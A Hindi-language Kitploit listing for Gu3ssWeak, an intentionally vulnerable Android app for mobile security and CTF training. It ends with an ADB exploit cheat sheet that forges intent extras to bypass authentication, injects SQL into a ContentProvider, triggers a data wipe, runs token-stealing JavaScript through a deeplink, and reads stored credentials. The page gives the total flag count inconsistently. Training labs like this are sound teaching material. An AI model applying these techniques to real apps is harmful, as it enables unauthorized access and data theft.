Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Gu3ssWeak — मोबाइल सुरक्षा अनुसंधान और बग बाउंटी अभ्यास के लिए जानबूझकर कमजोर Android ऐप - OWASP Mobile Top 10 | Kitploit
उपकरण/GitHubGitHub/b4sith-sec/gu3ssweak
एंड्रॉइड सुरक्षाभेद्यता विश्लेषणमोबाइल ऐप पेंटेस्टिंगवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगमोबाइल सुरक्षालर्निंग और शिक्षालर्निंग पाथ और कोर्सलैब और अभ्यास
GitHubb4sith-sec/gu3ssweak
82169 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Gu3ssWeak

मोबाइल सुरक्षा अनुसंधान और बग बाउंटी अभ्यास के लिए जानबूझकर कमजोर Android ऐप - OWASP Mobile Top 10

रिपॉजिटरी देखें

Gu3ssWeak

मोबाइल सुरक्षा अनुसंधान, बग बाउंटी अभ्यास, और CTF-शैली सीखने के लिए एक जानबूझकर कमजोर Android एप्लिकेशन। इसमें OWASP Mobile Top 10 पर मैप की गई 21 प्रलेखित कमजोरियाँ शामिल हैं।


त्वरित शुरुआत

git clone [email protected]:b4sith-sec/Gu3ssWeak.git
cd Gu3ssWeak
./gradlew assembleDebug
adb install -r app/build/outputs/apk/debug/app-debug.apk

ऐप लॉन्च करें, प्रत्येक लैब पर काम करें, फ्लैग कैप्चर करें, और उन्हें इन-ऐप CTF स्कोरबोर्ड पर सबमिट करें।


लैब श्रेणियाँ

श्रेणीकमजोरियाँफ्लैग
WebViewWV-01 से WV-055
DeeplinkDL-01 से DL-04, DL-CHAIN5
Auth / SQL InjectionSQL-011
Admin PanelAP-01 से AP-042
ContentProviderCP-011
Broadcast ReceiverBR-01 से BR-032
ServiceSV-01, SV-02a, SV-02b2
Network InterceptionNET-011
Banking / OTPOTP-011
LFILFI-011
StorageSTORE-011
XSSXSS-01, XSS-022

कुल 20 फ्लैग, साथ ही सभी को कैप्चर करने पर एक मास्टर फ्लैग प्रदान किया जाता है।


स्क्रीनशॉट

लैब सूचीCTF स्कोरबोर्ड
lab

CTF प्रवाह

  1. ऐप खोलें - सीधे लैब सूची पर पहुँचता है।
  2. एक लैब चुनें, कमजोरी का शोषण करें (UI, ADB, या दोनों के माध्यम से)।
  3. प्रत्येक सफल शोषण स्वतः ही अपना फ्लैग कैप्चर कर लेता है।
  4. पुष्टि करने के लिए "Submit Flag" पर टैप करें, या "CTF Scoreboard" पर प्रगति देखें।
  5. मास्टर फ्लैग अनलॉक करने के लिए सभी 18 फ्लैग कैप्चर करें।

दस्तावेज़ीकरण

  • ARCHITECTURE.md - प्रत्येक कमजोर घटक आंतरिक रूप से कैसे काम करता है
  • MITIGATIONS.md - प्रत्येक कमजोरी के लिए सुधार और उपचार मार्गदर्शन, जिसमें LFI-to-RCE एस्केलेशन अवधारणाएँ शामिल हैं
  • SECURITY.md - सुरक्षा नीति और जिम्मेदार प्रकटीकरण
  • CHECKSUMS.txt - निर्मित APK के लिए SHA256 चेकसम

ADB एक्सप्लॉइट चीटशीट

# Admin panel - exported, no permission
adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity

Admin panel - bypass the "fixed" auth check via forged intent extra

adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity --ez is_authenticated true

ContentProvider grant bypass - parenthesis breakout escapes the single-row grant

adb shell "content query --uri content://com.gu3sswe4k.app.contacts/contacts/1 --where \"1) OR (1=1\""

# Token injection via broadcast
adb shell am broadcast -a com.gu3sswe4k.app.SEND_TOKEN --es token FAKE --es user attacker

# Data wipe via exported service
adb shell am startservice -n com.gu3sswe4k.app/.services.DataSyncService --es action wipe_user_data

# Deeplink to WebView RCE chain
adb shell am start -a android.intent.action.VIEW -d "vulndroid://settings?redirect=com.gu3sswe4k.app.activities.WebViewActivity&url=javascript:VulnBridge.stealToken()"

# Read plaintext stored credentials
adb shell run-as com.gu3sswe4k.app cat /data/data/com.gu3sswe4k.app/shared_prefs/login_prefs.xml

# Watch for logged secrets
adb logcat | grep Gu3ssWeak

अस्वीकरण

यह परियोजना विशुद्ध रूप से शैक्षिक है। सभी कमजोरियाँ जानबूझकर हैं और प्रलेखित हैं। यहाँ दिखाई गई तकनीकें वास्तविक ऐप्स पर लागू होती हैं, लेकिन केवल उन सिस्टमों का परीक्षण करें जिनके आप मालिक हैं या जिनका परीक्षण करने के लिए आप अधिकृत हैं। पूर्ण अस्वीकरण और जिम्मेदार प्रकटीकरण मार्गदर्शन के लिए SECURITY.md देखें।

लाइसेंस

MIT - देखें LICENSE।

टूल डाउनलोड करें